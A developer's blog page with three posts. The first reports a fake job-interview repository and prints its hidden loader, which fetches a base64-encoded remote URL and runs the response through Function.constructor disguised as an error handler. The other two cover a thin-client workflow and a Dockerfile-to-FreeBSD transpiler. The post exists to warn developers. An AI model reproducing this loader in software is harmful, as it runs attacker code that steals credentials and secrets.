Friday, October 17, 2025

Almost exploited via a job interview assignment

Days ago someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed with my background and wanted me to move forward for a Senior Software Engineer position.

The technical interview email came from "Andrew Watson, Senior Engineering Engineer at Koinos" (hire @ koinos .finance) and seemed professional enough. Complete a 45-minute take-home coding assessment, push results to a public repository, share the link. Two business days. Standard tech interview stuff.

BitBucket and VMs

Andrew sent a BitBucket link to what looked like a typical full-stack React project. Frontend, backend with Express, routing, the usual. Nothing immediately suspicious.

I clicked the BitBucket link; probably not great opsec, but I do use BitBucket. Instead of cloning to my local machine though, I spun up a Google Cloud VM. Call it paranoia or good practice, but something made me want to keep this at arm's length (well, it is something crypto related).

Good thing too. I found the malicious code by manually reviewing the files. Never even ran npm install or built the project.

Middleware secrets

Buried in the backend middleware, specifically the cookie handling code, I found something concerning.

The code fetched data from a remote URL (base64 encoded) via mocki .io, then passed the response to what looked like an innocent "error handler" function. But this wasn't error handling: it used JavaScript's Function.constructor to execute whatever code the remote server returned.

const errorHandler = (error) => {

    const createHandler = (errCode) => {

        const handler = new (Function.constructor)('require', errCode);

        return handler;

    };

    const handlerFunc = createHandler(error);

     handlerFunc(require);

}

axios.get(atob(COOKIE_URL)).then(

    res => errorHandler(res.data.cookie)

  );

The moment I would have started the backend server, it would have downloaded and executed arbitrary code from an attacker-controlled server. Environment variables, API keys, credentials, sensitive files, backdoors.

A win for manual code review.

What made it work

The sophistication is what gets me. This wasn't some obvious phishing email with broken English. Professional LinkedIn outreach. Realistic assignment structure. Hosted on BitBucket, a trusted platform. Actual working React code with malicious payload hidden in middleware.

The malicious code used innocent function names like errorHandler and getCookie, tucked away in middleware where most developers wouldn't scrutinize carefully. Who thoroughly audits every line of a take-home assignment before running it?

It's targeted at developers who regularly download and run unfamiliar code as part of their job. That's the genius of it.

The obvious signs

Looking back, the red flags were there:

  • Salary range mentioned immediately.
  • Extreme flexibility: part-time acceptable, even with a current job.
  • "Senior Engineering Engineer" is redundant.
  • Two business days for a 45-minute assessment creates artificial urgency.

But the real red flag was in the code: base64-encoded URLs, remote code execution patterns, obfuscated logic in what should be straightforward middleware.

What this means

This is part of a growing trend of supply chain attacks targeting developers. We're attractive targets because we routinely download and execute code, have access to sensitive systems, and work with valuable intellectual property.

The sophistication is increasing. Not just phishing emails anymore; fully functional applications with malicious code carefully hidden where it might go unnoticed. Hosted on legitimate platforms like BitBucket for added credibility.

The thing is, the better these attacks get, the more they exploit the fundamental nature of development work. We clone repositories. We run npm install. We execute code. That's the job.

So what do you do? Review code before running it. Use isolated environments: VMs, Docker containers, cloud instances. Use Chromebooks for work! Watch for obfuscation. Be suspicious of too-good-to-be-true offers. Trust your instincts.

That nagging feeling that made me use a VM instead of my local machine was spot-on.

Your security is worth more than any job opportunity.

Thursday, October 09, 2025

The Modern Thin Client

For years, the developer community has been locked in a quiet arms race over who has the most powerful laptop. I’ve stepped off that treadmill. My setup is a modern take on the thin client, and it has made my workflow more focused, secure, and flexible.

At its heart, the principle is simple: use a lean local machine that runs only a browser, a terminal, and Visual Studio Code. The core of the work happens on a more powerful computer, which is often just another machine in my home office, accessible over the local network. I use the terminal to SSH into it, and VS Code's Remote Development to edit files directly on that remote machine. The local device becomes a high-fidelity window into a more powerful computer, and since it all runs over the intranet, my work continues uninterrupted even if the internet goes down.

This philosophy is portable. I have a Chromebook that I leave at my in-laws, perfectly set up for this. At home, my primary machine is an older MacBook Pro that runs only Chrome, Terminal, and VSCode. Both devices are just different gateways to the same powerful remote workspace.

This approach has the soul of an old-school UNIX workstation but with a modern editor. The terminal is the control center, but instead of a monochrome vi session, you get the full VSCode experience with all its extensions, running seamlessly on remote files.

A major benefit is the built-in security isolation. In a traditional setup, every script and dependency runs on the same machine as your primary browser with all its logged-in sessions. Here, there's a clear boundary: the local machine is for "trusted" tasks like browsing, while the remote machine is for "untrusted" work. A malicious script on the server cannot touch local browser data.

The most significant power, however, is the ability to scale. I've had situations where I needed parallel builds of separate branches for a resource-heavy project. A single machine couldn't handle two instances at once. With this setup, it was trivial: one VSCode window was connected to a powerful machine running the develop branch, and a second VSCode window was connected to an entirely different server running the feature branch. Each had its own dedicated resources, something impossible with a single laptop.

This model redefines the role of your laptop. It’s not about having a less capable machine, but about building a more capable and resilient system. The power is on the servers, and the local device is just a perfect, secure window into it.

Monday, October 06, 2025

Building a Dockerfile Transpiler

I'm excited to share dxform, a side project I've been working on while searching for my next role: a Dockerfile transpiler that can transform containers between different base systems and generate FreeBSD jail configurations.

The concept started simple: what if Dockerfiles could serve as a universal format for defining not just Docker containers, but other containerization systems too? Specifically, I wanted to see if I could use Dockerfiles—which developers already know and love—as the input format for FreeBSD jails.

I have some background building transpilers from a previous job, so I knew the general shape of the problem. But honestly, I expected this to be a much larger undertaking. Two things made it surprisingly manageable:

Dockerfiles are small. Unlike general-purpose programming languages, Dockerfiles have a limited instruction set (FROM, RUN, COPY, ENV, etc.). This meant the core transpiler could stay focused and relatively compact.

AI-assisted development works (mostly). This project became an experiment in how much I could orchestrate AI versus writing code myself. I've been using AI tools so heavily I'm hitting weekly limits. The feedback has been fascinating: AI is surprisingly good at some tasks but still needs human architectural decisions. It's an odd mix where it gets things right and wrong in unexpected places.

Here's where complexity crept in: the biggest challenge wasn't the Dockerfile instructions themselves—it was parsing the shell commands inside RUN instructions.

When you write:

RUN apt-get update && apt-get install -y curl build-essential

The transpiler needs to understand that apt-get install command deeply enough to transform it to:

RUN apk update && apk add curl build-base

This meant building a shell command parser on top of the Dockerfile parser. I used mvdan.cc/sh for this, and it works beautifully for the subset of shell commands that appear in Dockerfiles.

dxform can currently transform between base systems (convert Debian/Ubuntu containers to Alpine and vice versa), translate package managers (automatically mapping ~70 common packages between apt and apk), and preserve your comments and structure.

The most interesting part is the FreeBSD target. The tool has two outputs: --target freebsd-build creates a shell script that sets up ZFS datasets and runs the build commands, while --target freebsd-jail emits the jail configuration itself. Together, these let you take a standard Dockerfile and deploy it to FreeBSD's native containerization system.

dxform transform --target freebsd-build Dockerfile > build.sh

dxform transform --target freebsd-jail Dockerfile > jail.conf

It's early days, but the potential is there: Dockerfiles as a universal container definition format, deployable to Docker or FreeBSD jails.

This is very much an experiment and a learning experience. The package mappings could be more comprehensive, the FreeBSD emitter could be more sophisticated, and there are surely edge cases I haven't encountered yet. But it works, and it demonstrates something compelling: with the right abstractions, we can build bridges between different containerization ecosystems.

The project is open source and ready for experimentation. Whether you're interested in cross-platform containers, FreeBSD jails, or the mechanics of building transpilers for domain-specific languages, I'd love to hear your thoughts.

Check out the project on GitHub to see the full source and try it yourself.

Almost exploited via a job interview assignment

Days ago someone reached out on LinkedIn claiming to represent Koinos Finance's hiring team. Christian Muaña said they were impressed wi...